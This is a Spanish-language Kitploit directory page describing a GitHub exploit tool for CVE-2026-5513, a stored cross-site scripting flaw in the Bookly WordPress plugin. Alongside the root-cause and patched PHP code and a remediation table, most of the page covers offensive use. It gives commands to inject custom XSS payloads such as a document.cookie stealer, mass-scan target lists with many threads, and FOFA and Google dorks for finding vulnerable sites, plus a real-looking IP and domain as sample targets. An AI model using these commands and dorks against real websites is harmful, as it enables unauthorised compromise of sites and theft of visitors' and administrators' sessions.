Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-5513 — CVE-2026-5513: Bookly <= 27.2 XSS Almacenado vía Cookie (No autenticado) | Kitploit
Herramientas/GitHubGitHub/xaanziu/cve-2026-5513
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubxaanziu/cve-2026-5513

CVE-2026-5513

CVE-2026-5513: Bookly <= 27.2 XSS Almacenado vía Cookie (No autenticado)

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-5513 — Bookly ≤ 27.2 XSS Almacenado a través de Cookie

CVE CVSS Type Auth

Resumen

CampoValor
CVE IDCVE-2026-5513
VulnerabilidadCross-Site Scripting Almacenado (XSS)
PluginBookly — Sistema de Programación y Reserva de Citas en Línea
Afectado≤ 27.2
Parcheado27.3+
CVSS 3.17.2 (Alto) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWECWE-79
Autenticación requeridaNinguna
Requisito previoRecordar información personal en cookies debe estar habilitado (deshabilitado por defecto)

Descripción

El plugin Bookly para WordPress es vulnerable a Cross-Site Scripting Almacenado a través de la cookie bookly-customer-full-name en versiones hasta la 27.2 inclusive debido a una insuficiente sanitización de entrada y escape de salida.

Cuando la configuración "Recordar información personal en cookies" está habilitada, el plugin lee el valor de la cookie bookly-customer-full-name y lo renderiza directamente en el HTML del formulario de reserva sin el escape adecuado. Un atacante no autenticado puede inyectar cargas útiles arbitrarias de JavaScript a través de esta cookie que se ejecutan cada vez que cualquier usuario (incluyendo administradores) visita una página que contiene el formulario de reserva de Bookly.

Flujo del Ataque

root@kitploit:~
Atacante → Establecer cookie maliciosa (bookly-customer-full-name=<script>...</script>)
         → Visitar página con formulario de reserva de Bookly
         → El plugin lee la cookie, renderiza el valor sin escapar
         → La carga útil XSS se ejecuta en el contexto del navegador de la víctima

Causa Raíz

root@kitploit:~
// VULNERABLE — Bookly ≤ 27.2
$full_name = $_COOKIE['bookly-customer-full-name'];  // No sanitization
echo '<input type="text" value="' . $full_name . '" />';  // No escaping
root@kitploit:~
// PATCHED — Bookly 27.3+
$full_name = sanitize_text_field($_COOKIE['bookly-customer-full-name']);
echo '<input type="text" value="' . esc_attr($full_name) . '" />';

Características

root@kitploit:~
 ✓ Sondeo automático de IP/Dominio (HTTP/HTTPS, puertos comunes, detección de redirecciones)
 ✓ Detección de plugins WordPress y Bookly con verificación de versión
 ✓ Detección de configuración de cookies (análisis JS de BooklyL10n + reflexión canary)
 ✓ Pruebas XSS en múltiples contextos (HTML, JavaScript, inyección en atributos)
 ✓ Inyección de carga útil con verificación de reflexión
 ✓ Objetivo único o escaneo masivo desde archivo
 ✓ Escaneo multi-hilo (hasta 20 hilos)
 ✓ Soporte de proxy (Burp, etc.)
 ✓ Guardado automático de resultados vulnerables
 ✓ Modos interactivo y CLI

Instalación

root@kitploit:~
pip install requests colorama

Uso

Modo CLI

root@kitploit:~
# Check single target
python CVE-2026-5513.py -u https://target.com -v

# Check single IP (auto-probe ports + redirects)
python CVE-2026-5513.py -u 167.99.0.203 -v

# Check + inject XSS payload
python CVE-2026-5513.py -u https://target.com --inject -v

# Custom XSS payload
python CVE-2026-5513.py -u https://target.com --inject --payload "<svg onload=alert(document.cookie)>"

# Mass scan from file
python CVE-2026-5513.py -l targets.txt -t 20 -o vuln.txt

# With Burp proxy
python CVE-2026-5513.py -u https://target.com -v --proxy http://127.0.0.1:8080

Modo Interactivo

root@kitploit:~
python CVE-2026-5513.py

Opciones

Formatos de Objetivos

La herramienta acepta cualquiera de estos formatos en -u o en el archivo de lista de objetivos:

root@kitploit:~
https://example.com
http://example.com
example.com
192.168.1.100
192.168.1.100:8080

Para IPs simples, la herramienta automáticamente:

  • Prueba puertos 443, 80, 8443, 8080
  • Detecta redirecciones HTTP → HTTPS
  • Detecta redirecciones IP → dominio (ej. 167.99.0.203 → https://book.repairrite.com)
  • Escanea subdirectorios de WordPress (/wp/, /blog/, /wordpress/, etc.)

Cadena de Explotación

root@kitploit:~
PASO 0 → Sondear objetivo (IP/dominio → resolver URL base, detectar redirecciones)
PASO 1 → Detectar plugin Bookly (readme.txt, directorio del plugin, assets, verificación de versión)
PASO 2 → Verificar configuración de cookies (análisis JS de BooklyL10n + prueba de reflexión canary)
PASO 3 → Probar reflexión XSS (contexto HTML, contexto JS, contexto de atributos)
PASO 4 → Inyectar carga útil (si modo --inject, verificar reflexión)

Google Dorks

root@kitploit:~
# FOFA
body="bookly-responsive-appointment-booking-tool"
body="bookly-customer-full-name"
body="bookly-form-group" && body="wp-content/plugins/bookly"

# Google
inurl:"/wp-content/plugins/bookly-responsive-appointment-booking-tool/readme.txt"
intitle:"Book Appointment" inurl:"booking" intext:"bookly"

Remedio

PrioridadAcción
🔴Actualizar Bookly a la versión 27.3+
🟡Deshabilitar "Recordar información personal en cookies" en Ajustes de Bookly → General
🟢Implementar reglas WAF para filtrar XSS en valores de cookies

Referencias

  • NVD — CVE-2026-5513
  • Aviso de Wordfence
  • Tenable
  • Registro de cambios de Bookly

Descargo de responsabilidad

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtenga la autorización adecuada antes de realizar pruebas. El autor no se hace responsable del mal uso de esta herramienta.

Licencia

MIT

Descargar herramienta
OpciónDescripción
-u URLObjetivo único (URL, dominio o IP)
-l ARCHIVOArchivo con lista de objetivos (uno por línea)
--injectInyectar carga útil XSS (por defecto: solo verificar)
--payload STRCarga útil XSS personalizada
-t NNúmero de hilos (por defecto: 10, máximo: 20)
--proxy URLProxy HTTP (ej. http://127.0.0.1:8080)
-o ARCHIVOGuardar resultados en archivo
-vSalida verbose
🟢Implementar cabeceras de Content-Security-Policy (CSP)